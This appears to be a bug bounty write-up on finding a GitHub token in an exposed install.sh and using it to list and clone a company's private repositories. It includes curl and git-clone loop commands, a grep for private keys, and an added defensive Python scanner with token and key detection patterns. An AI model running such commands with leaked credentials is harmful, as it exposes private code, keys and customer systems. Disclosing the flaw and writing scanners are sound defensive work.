Full infrastructure takeover of many brands of a company
Note: this private program is hosted on the Bugcrowd platform and has many brands.
While testing this program I brute-forced directories and found this directory listing: http://sub.target.com/scripts
While analysing these files I found an interesting token in the [install.sh] file.
This is a GitHub access token, [d42e9078e94930************], but first I want to verify whether this token is valid or expired, because when a developer creates this token they can choose a time for it to expire automatically, like this ..
Let's try to verify it
Request a URL like this in the browser or with curl, then check whether the response lists repositories or says the token has expired ..
Amazing!! I can list private repositories and clone them. But I can't report it without making sure the data is related to the company, because maybe this developer only works part-time for the company, so I will clone the private repositories and analyse them, let's go
curl "https://api.github.com/orgs/<username>/repos?access_token=<token>" | grep '"name"' | cut -d ":" -f 2 | cut -d '"' -f 2 > private_repos_name.txt
for repo in $(cat private_repos_name.txt); do git clone https://<access-token>@github.com/<username>/$repo; done
This bash code clones all private repositories to my VPS so I can analyse them.
I found 5.4G of repositories, OMG..
I can't analyse this much data in a short time, so I will use the grep command to find sensitive data.
# Grep private ssh key command
grep -rlE -- '-----BEGIN [A-Z ]*PRIVATE KEY-----' .
This grep lists every file in the cloned repositories that contains a private SSH key header, very nice
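The two leaks in this write-up, a hard-coded token in a shell script and private keys committed to repositories, are exactly what a secret scanner run in CI or as a pre-commit hook is meant to catch before the files are ever published. The scanner below is an added example written for this page, not the author's tooling or anything from the program; the 40-hex classic GitHub token format and the newer ghp_-style prefixed format are real formats, while the file names, the token value and the key header in the demo tree are constructed and not real secrets.

```python
"""Secret scanner: flag GitHub-style tokens and private-key blocks in a
source tree, the way a pre-commit or CI check would, before a file like
install.sh lands in a public directory listing or a repository."""
import re
import tempfile
from pathlib import Path

# What the scanner looks for. The 40-hex form is the classic GitHub token
# format (the token on the page is hex); it is only flagged next to a
# keyword such as token= or access_token= so bare commit SHAs are ignored.
# The ghp_/gho_/ghu_/ghs_/ghr_ form is GitHub's newer prefixed token format.
PATTERNS = {
    "github_token_classic": re.compile(
        r"(?i)(?:token|secret|api[_-]?key)\s*[=:]\s*['\"]?([0-9a-f]{40})\b"),
    "github_token_prefixed": re.compile(r"\b(gh[pousr]_[A-Za-z0-9]{36,})\b"),
    "private_key": re.compile(r"(-----BEGIN (?:[A-Z]+ )?PRIVATE KEY-----)"),
}

# Directories that are not part of the code being reviewed.
SKIP_DIRS = {".git", "node_modules", "vendor"}


def redact(secret: str, keep: int = 6) -> str:
    """Keep only a short prefix so a report can be filed without re-leaking the value."""
    return secret[:keep] + "*" * max(0, len(secret) - keep)


def scan_text(text: str, source: str) -> list[dict]:
    """Return one finding per match: kind, file, 1-based line and a redacted value."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for kind, pattern in PATTERNS.items():
            for match in pattern.finditer(line):
                findings.append({
                    "kind": kind,
                    "file": source,
                    "line": lineno,
                    "redacted": redact(match.group(1)),
                })
    return findings


def scan_tree(root: Path) -> list[dict]:
    """Walk a directory, skipping VCS/dependency folders and undecodable (binary) files."""
    findings = []
    for path in sorted(root.rglob("*")):
        if not path.is_file() or SKIP_DIRS & set(path.relative_to(root).parts):
            continue
        try:
            text = path.read_text(encoding="utf-8")
        except UnicodeDecodeError:
            continue  # binary blob; key files are text and are still read
        findings.extend(scan_text(text, str(path.relative_to(root))))
    return findings


def demo() -> list[dict]:
    """Build a constructed sample tree and scan it; every value here is made up."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "scripts").mkdir()
        # Constructed install.sh with a token-shaped value (not a real token).
        (root / "scripts" / "install.sh").write_text(
            "#!/bin/sh\n"
            "GITHUB_TOKEN=" + "d42e9078e94930" + "0" * 26 + "\n"
            "git clone https://$GITHUB_TOKEN@github.com/example-org/app\n")
        # Constructed private key header, body omitted.
        (root / "deploy_key").write_text(
            "-----BEGIN OPENSSH PRIVATE KEY-----\nAAAA...\n"
            "-----END OPENSSH PRIVATE KEY-----\n")
        # A commit SHA in prose must not be reported: no keyword next to it.
        (root / "CHANGELOG.md").write_text(
            "Fixed in 0123456789abcdef0123456789abcdef01234567\n")
        # Anything under .git is skipped even if it looks like a token.
        (root / ".git").mkdir()
        (root / ".git" / "config").write_text("token = ghp_" + "A" * 36 + "\n")
        return scan_tree(root)


if __name__ == "__main__":
    for f in demo():
        print(f"{f['file']}:{f['line']} {f['kind']} {f['redacted']}")
```

The keyword requirement on the classic pattern is the trade-off worth noting: it keeps commit hashes and other 40-hex values out of the report, at the cost of missing a bare token with no surrounding name, which is why a real deployment pairs pattern matching with entropy checks and with revoking any token that is found rather than only reporting it.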
In these files I found many credentials and many Docker connection strings, but I couldn't use them because that is out of scope for the program: the program says not to try to connect to databases or internal infrastructure.
But I have more than 15 private repositories related to 15 brands :)
In every repo I found [panel passwords, database backups, full application code, cloud creds], and with them I could connect to and take over all brands.
Business impact
I reached all of the [product architecture, product layouts], but sorry, I can't share this, to preserve the confidentiality of company data.